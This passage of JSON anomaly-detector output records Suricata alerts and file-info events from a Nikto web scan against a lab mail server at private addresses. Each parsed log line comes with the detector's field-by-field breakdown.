"AnalysisComponent": { "AnalysisComponentIdentifier": 9, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.261300 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46874 -> 192.168.10.154:80", "/parser/model/time": 1583349514.2613, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46874, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.261300 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46874 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.26 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value 
combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.render_css", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.261544+0000\",\"flow_id\":1200378918664871,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46874,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.render_css\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.render_css\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.261544, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1200378918664871,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46874,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.render_css\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.render_css\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", 
"/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46874,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.render_css\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.render_css\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.render_css\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.render_css\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.render_css", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", 
"/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.render_css", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": 
"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46874,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46874, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1200378918664871,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1200378918664871, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.261544+0000\",\"flow_id\":1200378918664871,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46874,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.render_css\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.render_css\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], 
"Timestamps": [ 1583349514.26 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.263653 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46876 -> 192.168.10.154:80", "/parser/model/time": 1583349514.263653, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46876, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.263653 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46876 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.26 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.*", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.263864+0000\",\"flow_id\":486095792505167,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46876,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.*\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.*\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.263864, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":486095792505167,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46876,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.*\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.*\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46876,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.*\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.*\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.*\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.*\",", 
"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.*", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.*", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": 
"\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46876,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46876, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":486095792505167,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 486095792505167, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.263864+0000\",\"flow_id\":486095792505167,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46876,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.*\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.*\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.26 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.265515 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46878 -> 192.168.10.154:80", "/parser/model/time": 1583349514.265515, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46878, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.265515 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by 
non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46878 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.phpp", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.265852+0000\",\"flow_id\":1618846172187243,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46878,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.phpp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.phpp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.265852, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1618846172187243,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": 
"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46878,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.phpp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.phpp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46878,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.phpp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.phpp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.phpp\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": 
",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.phpp\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.phpp", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.phpp", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", 
"/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46878,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46878, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": 